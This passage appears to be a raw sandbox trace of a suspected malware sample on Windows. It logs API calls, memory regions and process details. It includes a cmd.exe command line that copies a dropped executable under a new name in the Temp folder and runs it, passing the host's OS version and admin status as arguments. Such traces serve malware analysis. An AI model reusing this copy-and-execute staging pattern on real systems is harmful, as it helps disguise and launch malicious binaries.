(_String1="\"C", _String2="DEL") returned -66 [0107.187] _wcsicmp (_String1="\"C", _String2="TYPE") returned -82 [0107.187] _wcsicmp (_String1="\"C", _String2="COPY") returned -65 [0107.187] _wcsicmp (_String1="\"C", _String2="CD") returned -65 [0107.187] _wcsicmp (_String1="\"C", _String2="CHDIR") returned -65 [0107.187] _wcsicmp (_String1="\"C", _String2="RENAME") returned -80 [0107.187] _wcsicmp (_String1="\"C", _String2="REN") returned -80 [0107.187] _wcsicmp (_String1="\"C", _String2="ECHO") returned -67 [0107.187] _wcsicmp (_String1="\"C", _String2="SET") returned -81 [0107.187] _wcsicmp (_String1="\"C", _String2="PAUSE") returned -78 [0107.187] _wcsicmp (_String1="\"C", _String2="DATE") returned -66 [0107.188] _wcsicmp (_String1="\"C", _String2="TIME") returned -82 [0107.188] _wcsicmp (_String1="\"C", _String2="PROMPT") returned -78 [0107.188] _wcsicmp (_String1="\"C", _String2="MD") returned -75 [0107.188] _wcsicmp (_String1="\"C", _String2="MKDIR") returned -75 [0107.188] _wcsicmp (_String1="\"C", _String2="RD") returned -80 [0107.188] _wcsicmp (_String1="\"C", _String2="RMDIR") returned -80 [0107.188] _wcsicmp (_String1="\"C", _String2="PATH") returned -78 [0107.188] _wcsicmp (_String1="\"C", _String2="GOTO") returned -69 [0107.188] _wcsicmp (_String1="\"C", _String2="SHIFT") returned -81 [0107.188] _wcsicmp (_String1="\"C", _String2="CLS") returned -65 [0107.188] _wcsicmp (_String1="\"C", _String2="CALL") returned -65 [0107.188] _wcsicmp (_String1="\"C", _String2="VERIFY") returned -84 [0107.188] _wcsicmp (_String1="\"C", _String2="VER") returned -84 [0107.188] _wcsicmp (_String1="\"C", _String2="VOL") returned -84 [0107.188] _wcsicmp (_String1="\"C", _String2="EXIT") returned -67 [0107.188] _wcsicmp (_String1="\"C", _String2="SETLOCAL") returned -81 [0107.188] _wcsicmp (_String1="\"C", _String2="ENDLOCAL") returned -67 [0107.188] _wcsicmp (_String1="\"C", _String2="TITLE") returned -82 [0107.188] _wcsicmp (_String1="\"C", _String2="START") returned -81 
[0107.188] _wcsicmp (_String1="\"C", _String2="DPATH") returned -66 [0107.188] _wcsicmp (_String1="\"C", _String2="KEYS") returned -73 [0107.188] _wcsicmp (_String1="\"C", _String2="MOVE") returned -75 [0107.188] _wcsicmp (_String1="\"C", _String2="PUSHD") returned -78 [0107.188] _wcsicmp (_String1="\"C", _String2="POPD") returned -78 [0107.188] _wcsicmp (_String1="\"C", _String2="ASSOC") returned -63 [0107.188] _wcsicmp (_String1="\"C", _String2="FTYPE") returned -68 [0107.188] _wcsicmp (_String1="\"C", _String2="BREAK") returned -64 [0107.188] _wcsicmp (_String1="\"C", _String2="COLOR") returned -65 [0107.188] _wcsicmp (_String1="\"C", _String2="MKLINK") returned -75 [0107.188] _wcsicmp (_String1="\"C", _String2="DIR") returned -66 [0107.188] _wcsicmp (_String1="\"C", _String2="ERASE") returned -67 [0107.188] _wcsicmp (_String1="\"C", _String2="DEL") returned -66 [0107.188] _wcsicmp (_String1="\"C", _String2="TYPE") returned -82 [0107.188] _wcsicmp (_String1="\"C", _String2="COPY") returned -65 [0107.188] _wcsicmp (_String1="\"C", _String2="CD") returned -65 [0107.189] _wcsicmp (_String1="\"C", _String2="CHDIR") returned -65 [0107.189] _wcsicmp (_String1="\"C", _String2="RENAME") returned -80 [0107.189] _wcsicmp (_String1="\"C", _String2="REN") returned -80 [0107.189] _wcsicmp (_String1="\"C", _String2="ECHO") returned -67 [0107.189] _wcsicmp (_String1="\"C", _String2="SET") returned -81 [0107.189] _wcsicmp (_String1="\"C", _String2="PAUSE") returned -78 [0107.189] _wcsicmp (_String1="\"C", _String2="DATE") returned -66 [0107.189] _wcsicmp (_String1="\"C", _String2="TIME") returned -82 [0107.189] _wcsicmp (_String1="\"C", _String2="PROMPT") returned -78 [0107.189] _wcsicmp (_String1="\"C", _String2="MD") returned -75 [0107.189] _wcsicmp (_String1="\"C", _String2="MKDIR") returned -75 [0107.189] _wcsicmp (_String1="\"C", _String2="RD") returned -80 [0107.189] _wcsicmp (_String1="\"C", _String2="RMDIR") returned -80 [0107.189] _wcsicmp (_String1="\"C", 
_String2="PATH") returned -78 [0107.189] _wcsicmp (_String1="\"C", _String2="GOTO") returned -69 [0107.189] _wcsicmp (_String1="\"C", _String2="SHIFT") returned -81 [0107.189] _wcsicmp (_String1="\"C", _String2="CLS") returned -65 [0107.189] _wcsicmp (_String1="\"C", _String2="CALL") returned -65 [0107.189] _wcsicmp (_String1="\"C", _String2="VERIFY") returned -84 [0107.189] _wcsicmp (_String1="\"C", _String2="VER") returned -84 [0107.189] _wcsicmp (_String1="\"C", _String2="VOL") returned -84 [0107.189] _wcsicmp (_String1="\"C", _String2="EXIT") returned -67 [0107.189] _wcsicmp (_String1="\"C", _String2="SETLOCAL") returned -81 [0107.189] _wcsicmp (_String1="\"C", _String2="ENDLOCAL") returned -67 [0107.189] _wcsicmp (_String1="\"C", _String2="TITLE") returned -82 [0107.189] _wcsicmp (_String1="\"C", _String2="START") returned -81 [0107.189] _wcsicmp (_String1="\"C", _String2="DPATH") returned -66 [0107.189] _wcsicmp (_String1="\"C", _String2="KEYS") returned -73 [0107.189] _wcsicmp (_String1="\"C", _String2="MOVE") returned -75 [0107.189] _wcsicmp (_String1="\"C", _String2="PUSHD") returned -78 [0107.189] _wcsicmp (_String1="\"C", _String2="POPD") returned -78 [0107.189] _wcsicmp (_String1="\"C", _String2="ASSOC") returned -63 [0107.189] _wcsicmp (_String1="\"C", _String2="FTYPE") returned -68 [0107.189] _wcsicmp (_String1="\"C", _String2="BREAK") returned -64 [0107.189] _wcsicmp (_String1="\"C", _String2="COLOR") returned -65 [0107.190] _wcsicmp (_String1="\"C", _String2="MKLINK") returned -75 [0107.190] _wcsicmp (_String1="\"C", _String2="FOR") returned -68 [0107.190] _wcsicmp (_String1="\"C", _String2="IF") returned -71 [0107.190] _wcsicmp (_String1="\"C", _String2="REM") returned -80 [0107.190] _wcsnicmp (_String1="C:\\U", _String2="cmd ", _MaxCount=0x4) returned -51 [0107.190] SetErrorMode (uMode=0x0) returned 0x0 [0107.190] SetErrorMode (uMode=0x1) returned 0x0 [0107.190] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\.", 
nBufferLength=0x208, lpBuffer=0x3604f0, lpFilePart=0x26f16c | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp", lpFilePart=0x26f16c*="Temp") returned 0x23 [0107.190] SetErrorMode (uMode=0x0) returned 0x1 [0107.190] NeedCurrentDirectoryForExePathW (ExeName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\.") returned 1 [0107.191] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4aa50640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0107.194] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0107.194] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe", fInfoLevelId=0x1, lpFindFileData=0x26ef08, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26ef08) returned 0x3624b0 [0107.194] FindClose (in: hFindFile=0x3624b0 | out: hFindFile=0x3624b0) returned 1 [0107.194] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0107.195] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0107.195] GetConsoleTitleW (in: lpConsoleTitle=0x26f3e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0107.195] InitializeProcThreadAttributeList (in: lpAttributeList=0x26f268, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x26f330 | out: lpAttributeList=0x26f268, lpSize=0x26f330) returned 1 [0107.195] UpdateProcThreadAttribute (in: lpAttributeList=0x26f268, dwFlags=0x0, Attribute=0x60001, lpValue=0x26f328, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x26f268, lpPreviousValue=0x0) returned 1 [0107.195] GetStartupInfoW (in: lpStartupInfo=0x26f224 | out: lpStartupInfo=0x26f224*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) 
[0107.195] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0107.195] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0107.195] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0107.195] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0107.195] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0107.195] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0107.195] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0107.195] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0107.195] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0107.195] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0107.195] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0107.195] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0107.195] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0107.195] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0107.195] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0107.195] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0107.195] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0107.195] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0107.195] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0107.195] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0107.196] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0107.196] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0107.196] _wcsnicmp 
(_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0107.196] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0107.196] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0107.196] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0107.196] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0107.196] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0107.196] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0107.196] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0107.196] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0107.196] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0107.196] lstrcmpW (lpString1="\\Wtsk8WxH.exe", lpString2="\\XCOPY.EXE") returned -1 [0107.197] CreateProcessW (in: lpApplicationName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe", lpCommandLine="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"LOCAL_3188F4D96148D062\" \"60000\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x26f2c4*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"LOCAL_3188F4D96148D062\" \"60000\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x26f310 | out: 
lpCommandLine="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"LOCAL_3188F4D96148D062\" \"60000\"", lpProcessInformation=0x26f310*(hProcess=0x50, hThread=0x4c, dwProcessId=0xca4, dwThreadId=0xca8)) returned 1 [0107.605] CloseHandle (hObject=0x4c) returned 1 [0107.605] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0107.605] GetEnvironmentStringsW () returned 0x362d10* [0107.605] FreeEnvironmentStringsW (penv=0x362d10) returned 1 [0107.605] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0108.595] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x26f204 | out: lpExitCode=0x26f204*=0x0) returned 1 [0108.595] CloseHandle (hObject=0x50) returned 1 [0108.595] _vsnwprintf (in: _Buffer=0x26f34c, _BufferCount=0x13, _Format="%08X", _ArgList=0x26f210 | out: _Buffer="00000000") returned 8 [0108.595] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0108.595] GetEnvironmentStringsW () returned 0x3624d0* [0108.595] FreeEnvironmentStringsW (penv=0x3624d0) returned 1 [0108.595] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0108.595] GetEnvironmentStringsW () returned 0x3624d0* [0108.595] FreeEnvironmentStringsW (penv=0x3624d0) returned 1 [0108.595] DeleteProcThreadAttributeList (in: lpAttributeList=0x26f268 | out: lpAttributeList=0x26f268) [0108.595] _get_osfhandle (_FileHandle=1) returned 0x7 [0108.595] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0108.595] _get_osfhandle (_FileHandle=1) returned 0x7 [0108.595] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4aa441ac | out: lpMode=0x4aa441ac) returned 1 [0108.596] _get_osfhandle (_FileHandle=0) returned 0x3 [0108.596] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4aa441b0 | out: lpMode=0x4aa441b0) returned 1 [0108.596] SetConsoleInputExeNameW () returned 0x1 [0108.596] GetConsoleOutputCP () returned 0x1b5 [0108.596] 
GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4aa44260 | out: lpCPInfo=0x4aa44260) returned 1 [0108.596] SetThreadUILanguage (LangId=0x0) returned 0x409 [0108.596] exit (_Code=0) Process: id = "30" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16780" os_pid = "0xc8c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe\" && \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"WIN_6.1_32|ADMIN_YES|INT_4\" \"60000\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4432 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 4433 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 4434 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 4435 start_va = 0xb0000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 4436 start_va = 0x4aa20000 end_va = 0x4aa6bfff entry_point = 0x4aa20000 region_type = mapped_file name = "cmd.exe" filename = 
"\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 4437 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4438 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 4439 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 4440 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 4441 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 4629 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 4630 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 4631 start_va = 0xa0000 end_va = 0xaffff entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 4632 start_va = 0x1d0000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 4633 start_va = 0x2d0000 end_va = 0x336fff entry_point = 0x2d0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4634 start_va = 0x6f8f0000 end_va = 0x6f8f6fff entry_point = 0x6f8f0000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" 
(normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 4635 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 4636 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 4637 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 4638 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 4639 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 4640 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 4641 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 4642 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 4643 start_va = 0x340000 end_va = 0x407fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 4644 start_va = 0x76490000 end_va = 
0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 4645 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 4646 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 4647 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 4648 start_va = 0x70000 end_va = 0x70fff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 4649 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 4650 start_va = 0x410000 end_va = 0x510fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 4651 start_va = 0x520000 end_va = 0x111ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 4652 start_va = 0x1120000 end_va = 0x1282fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001120000" filename = "" Region: id = 4761 start_va = 0x1290000 end_va = 0x155efff entry_point = 0x1290000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 48 os_tid = 0xc90 [0107.426] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1afaa4 | out: lpSystemTimeAsFileTime=0x1afaa4*(dwLowDateTime=0x7e090cc0, dwHighDateTime=0x1d440a9)) [0107.426] GetCurrentProcessId () returned 0xc8c [0107.426] GetCurrentThreadId 
() returned 0xc90 [0107.426] GetTickCount () returned 0x25b39 [0107.426] QueryPerformanceCounter (in: lpPerformanceCount=0x1afa9c | out: lpPerformanceCount=0x1afa9c*=16421552096) returned 1 [0107.427] GetModuleHandleA (lpModuleName=0x0) returned 0x4aa20000 [0107.427] __set_app_type (_Type=0x1) [0107.427] __p__fmode () returned 0x76b331f4 [0107.427] __p__commode () returned 0x76b331fc [0107.428] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4aa421a6) returned 0x0 [0107.428] __getmainargs (in: _Argc=0x4aa44238, _Argv=0x4aa44240, _Env=0x4aa4423c, _DoWildCard=0, _StartInfo=0x4aa44140 | out: _Argc=0x4aa44238, _Argv=0x4aa44240, _Env=0x4aa4423c) returned 0 [0107.428] GetCurrentThreadId () returned 0xc90 [0107.428] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xc90) returned 0x38 [0107.428] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0107.428] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0107.428] SetThreadUILanguage (LangId=0x0) returned 0x409 [0107.429] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0107.429] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1afa34 | out: phkResult=0x1afa34*=0x0) returned 0x2 [0107.429] VirtualQuery (in: lpAddress=0x1afa6b, lpBuffer=0x1afa04, dwLength=0x1c | out: lpBuffer=0x1afa04*(BaseAddress=0x1af000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0107.429] VirtualQuery (in: lpAddress=0xb0000, lpBuffer=0x1afa04, dwLength=0x1c | out: lpBuffer=0x1afa04*(BaseAddress=0xb0000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0107.429] VirtualQuery (in: lpAddress=0xb1000, lpBuffer=0x1afa04, dwLength=0x1c | out: 
lpBuffer=0x1afa04*(BaseAddress=0xb1000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0107.429] VirtualQuery (in: lpAddress=0xb3000, lpBuffer=0x1afa04, dwLength=0x1c | out: lpBuffer=0x1afa04*(BaseAddress=0xb3000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0107.429] VirtualQuery (in: lpAddress=0x1b0000, lpBuffer=0x1afa04, dwLength=0x1c | out: lpBuffer=0x1afa04*(BaseAddress=0x1b0000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x20000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0107.429] GetConsoleOutputCP () returned 0x1b5 [0107.429] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4aa44260 | out: lpCPInfo=0x4aa44260) returned 1 [0107.430] SetConsoleCtrlHandler (HandlerRoutine=0x4aa3e72a, Add=1) returned 1 [0107.430] _get_osfhandle (_FileHandle=1) returned 0x7 [0107.430] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0107.430] _get_osfhandle (_FileHandle=1) returned 0x7 [0107.430] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4aa441ac | out: lpMode=0x4aa441ac) returned 1 [0107.430] _get_osfhandle (_FileHandle=1) returned 0x7 [0107.430] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0107.431] _get_osfhandle (_FileHandle=0) returned 0x3 [0107.431] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4aa441b0 | out: lpMode=0x4aa441b0) returned 1 [0107.431] _get_osfhandle (_FileHandle=0) returned 0x3 [0107.431] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0107.431] GetEnvironmentStringsW () returned 0x1e03b0* [0107.432] FreeEnvironmentStringsW (penv=0x1e03b0) returned 1 [0107.432] GetEnvironmentStringsW () returned 0x1e03b0* [0107.432] FreeEnvironmentStringsW (penv=0x1e03b0) returned 1 [0107.432] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ae9a4 | out: 
phkResult=0x1ae9a4*=0x40) returned 0x0 [0107.432] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ae9ac, lpData=0x1ae9b0, lpcbData=0x1ae9a8*=0x1000 | out: lpType=0x1ae9ac*=0x0, lpData=0x1ae9b0*=0x60, lpcbData=0x1ae9a8*=0x1000) returned 0x2 [0107.432] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ae9ac, lpData=0x1ae9b0, lpcbData=0x1ae9a8*=0x1000 | out: lpType=0x1ae9ac*=0x4, lpData=0x1ae9b0*=0x1, lpcbData=0x1ae9a8*=0x4) returned 0x0 [0107.432] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ae9ac, lpData=0x1ae9b0, lpcbData=0x1ae9a8*=0x1000 | out: lpType=0x1ae9ac*=0x0, lpData=0x1ae9b0*=0x1, lpcbData=0x1ae9a8*=0x1000) returned 0x2 [0107.432] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", 